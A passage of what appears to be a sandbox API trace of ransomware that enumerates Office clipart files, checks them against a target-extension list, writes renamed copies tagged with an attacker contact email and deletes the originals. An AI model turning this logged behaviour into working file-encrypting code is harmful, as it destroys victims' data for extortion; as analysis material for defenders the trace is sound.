Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.306] lstrlenW (lpString=".1cd") returned 4 [0063.306] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01251_.WMF") returned 68 [0063.306] lstrlenW (lpString=".jpg") returned 4 [0063.306] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.306] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.306] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.306] GetLastError () returned 0x0 [0063.306] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x25ee, lpOverlapped=0x0) returned 1 [0063.325] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x25f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x25f0, lpOverlapped=0x0) returned 1 [0063.326] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.326] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.326] SetEndOfFile (hFile=0x358) returned 1 [0063.326] CloseHandle (hObject=0x358) returned 1 [0063.327] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.327] SetEndOfFile (hFile=0x350) returned 1 [0063.328] CloseHandle (hObject=0x350) returned 1 [0063.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.328] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19827_.wmf")) returned 1 [0063.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0063.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0063.329] lstrlenW (lpString=".doc") returned 4 [0063.329] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.329] lstrlenW (lpString=".docx") returned 5 [0063.329] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.329] lstrlenW (lpString=".pdf") returned 4 [0063.329] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.329] lstrlenW (lpString=".xls") returned 4 [0063.329] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.329] lstrlenW (lpString=".xlsx") returned 5 [0063.329] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.329] lstrlenW (lpString=".ppt") returned 4 [0063.329] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0063.329] lstrlenW (lpString=".zip") returned 4 [0063.329] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.329] lstrlenW (lpString=".rar") returned 4 [0063.329] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.329] lstrlenW (lpString=".bz2") returned 4 [0063.329] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.329] lstrlenW (lpString=".7z") returned 3 [0063.329] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0063.329] lstrlenW (lpString=".dbf") returned 4 [0063.329] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0063.329] lstrlenW (lpString=".1cd") returned 4 [0063.329] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.329] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19827_.WMF") returned 68 [0063.329] lstrlenW (lpString=".jpg") returned 4 [0063.329] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.335] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.335] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.335] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.335] GetLastError () returned 0x0 [0063.335] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2244, lpOverlapped=0x0) returned 1 [0063.425] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2250, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2250, lpOverlapped=0x0) returned 1 [0063.427] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.427] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.427] SetEndOfFile (hFile=0x358) returned 1 [0063.427] CloseHandle (hObject=0x358) returned 1 [0063.432] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.432] SetEndOfFile (hFile=0x350) returned 1 [0063.433] CloseHandle (hObject=0x350) returned 1 [0063.433] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.433] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf")) returned 1 [0063.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0063.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0063.434] lstrlenW (lpString=".doc") returned 4 [0063.434] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.434] lstrlenW (lpString=".docx") returned 5 [0063.434] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.434] lstrlenW (lpString=".pdf") returned 4 [0063.434] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.434] lstrlenW (lpString=".xls") returned 4 [0063.434] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.434] lstrlenW (lpString=".xlsx") returned 5 [0063.434] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.434] lstrlenW (lpString=".ppt") returned 4 [0063.434] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0063.434] lstrlenW (lpString=".zip") returned 4 [0063.434] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.434] lstrlenW (lpString=".rar") returned 4 [0063.434] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.434] lstrlenW (lpString=".bz2") returned 4 [0063.434] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.434] lstrlenW (lpString=".7z") returned 3 [0063.434] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0063.434] lstrlenW (lpString=".dbf") returned 4 [0063.434] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0063.435] lstrlenW (lpString=".1cd") returned 4 [0063.435] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 68 [0063.435] lstrlenW (lpString=".jpg") returned 4 [0063.435] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.435] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.435] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.436] GetLastError () returned 0x0 [0063.436] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3896, lpOverlapped=0x0) returned 1 [0063.445] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x38a0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x38a0, lpOverlapped=0x0) returned 1 [0063.446] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.446] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.446] SetEndOfFile (hFile=0x358) returned 1 [0063.447] CloseHandle (hObject=0x358) returned 1 [0063.448] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.448] SetEndOfFile (hFile=0x350) returned 1 [0063.449] CloseHandle (hObject=0x350) returned 1 [0063.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.449] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf")) returned 1 [0063.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0063.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0063.450] lstrlenW (lpString=".doc") returned 4 [0063.450] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.450] lstrlenW (lpString=".docx") returned 5 [0063.450] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.450] lstrlenW (lpString=".pdf") returned 4 [0063.450] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.450] lstrlenW (lpString=".xls") returned 4 [0063.450] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.450] lstrlenW (lpString=".xlsx") returned 5 [0063.450] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.450] lstrlenW (lpString=".ppt") returned 4 [0063.450] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.450] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0063.450] lstrlenW (lpString=".zip") returned 4 [0063.450] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.451] lstrlenW (lpString=".rar") returned 4 [0063.451] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.451] lstrlenW (lpString=".bz2") returned 4 [0063.451] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.451] lstrlenW (lpString=".7z") returned 3 [0063.451] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0063.451] lstrlenW (lpString=".dbf") returned 4 [0063.451] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0063.451] lstrlenW (lpString=".1cd") returned 4 [0063.451] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.451] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 68 [0063.451] lstrlenW (lpString=".jpg") returned 4 [0063.451] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.451] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.451] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.452] GetLastError () returned 0x0 [0063.452] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4780, lpOverlapped=0x0) returned 1 [0063.527] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4790, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4790, lpOverlapped=0x0) returned 1 [0063.530] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.530] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.530] SetEndOfFile (hFile=0x358) returned 1 [0063.530] CloseHandle (hObject=0x358) returned 1 [0063.531] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.531] SetEndOfFile (hFile=0x350) returned 1 [0063.532] CloseHandle (hObject=0x350) returned 1 [0063.533] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.533] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19988_.wmf")) returned 1 [0063.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0063.533] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0063.533] lstrlenW (lpString=".doc") returned 4 [0063.533] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.533] lstrlenW (lpString=".docx") returned 5 [0063.534] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.534] lstrlenW (lpString=".pdf") returned 4 [0063.534] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.534] lstrlenW (lpString=".xls") returned 4 [0063.534] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.534] lstrlenW (lpString=".xlsx") returned 5 [0063.534] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.534] lstrlenW (lpString=".ppt") returned 4 [0063.534] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0063.534] lstrlenW (lpString=".zip") returned 4 [0063.534] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.534] lstrlenW (lpString=".rar") returned 4 [0063.534] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.534] lstrlenW (lpString=".bz2") returned 4 [0063.534] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.534] lstrlenW (lpString=".7z") returned 3 [0063.534] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0063.534] lstrlenW (lpString=".dbf") returned 4 [0063.534] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0063.534] lstrlenW (lpString=".1cd") returned 4 [0063.534] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19988_.WMF") returned 68 [0063.534] lstrlenW (lpString=".jpg") returned 4 [0063.534] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.535] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.535] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0063.535] GetLastError () returned 0x0 [0063.535] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3f4, lpOverlapped=0x0) returned 1 [0063.553] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x400, lpOverlapped=0x0) returned 1 [0063.554] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0063.554] WriteFile (in: hFile=0x358, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0063.554] SetEndOfFile (hFile=0x358) returned 1 [0063.554] CloseHandle (hObject=0x358) returned 1 [0063.555] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.555] SetEndOfFile (hFile=0x350) returned 1 [0063.556] CloseHandle (hObject=0x350) returned 1 [0063.556] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0063.557] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf")) returned 1 [0063.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0063.557] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0063.557] lstrlenW (lpString=".doc") returned 4 [0063.557] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0063.557] lstrlenW (lpString=".docx") returned 5 [0063.557] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0063.557] lstrlenW (lpString=".pdf") returned 4 [0063.557] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0063.557] lstrlenW (lpString=".xls") returned 4 [0063.557] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0063.557] lstrlenW (lpString=".xlsx") returned 5 [0063.557] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0063.557] lstrlenW (lpString=".ppt") returned 4 [0063.558] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0063.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0063.558] lstrlenW (lpString=".zip") returned 4 [0063.558] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0063.558] lstrlenW (lpString=".rar") returned 4 [0063.558] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0063.558] lstrlenW (lpString=".bz2") returned 4 [0063.558] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0063.558] lstrlenW (lpString=".7z") returned 3 [0063.558] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0063.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0063.558] lstrlenW (lpString=".dbf") returned 4 [0063.558] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0063.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0063.558] lstrlenW (lpString=".1cd") returned 4 [0063.558] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0063.558] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0063.558] lstrlenW (lpString=".jpg") returned 4 [0063.558] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0063.567] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.567] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0063.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00130_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00130_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0063.570] GetLastError () returned 0x0 [0063.570] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5b8, lpOverlapped=0x0) returned 1 [0063.578] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x5c0, lpOverlapped=0x0) returned 1 [0063.579] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, 